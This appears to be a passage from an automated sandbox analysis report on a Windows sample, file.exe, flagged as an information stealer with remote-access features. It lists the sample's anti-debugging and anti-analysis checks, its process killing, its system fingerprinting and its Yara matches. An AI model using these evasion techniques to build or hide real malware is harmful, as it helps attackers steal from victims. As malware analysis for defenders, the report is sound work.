Source: file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F34610 VirtualProtect ?,00000004,00000100,00000000

0_2_00F34610

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F49BB0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F49AA0 mov eax, dword ptr fs:[00000030h]

0_2_00F49AA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00F47690

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match

File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00F49790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_00F498E0

Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F775A8 cpuid

0_2_00F775A8

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00F47D20

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00F46BC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00F479E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00F47BC0

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match	File source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP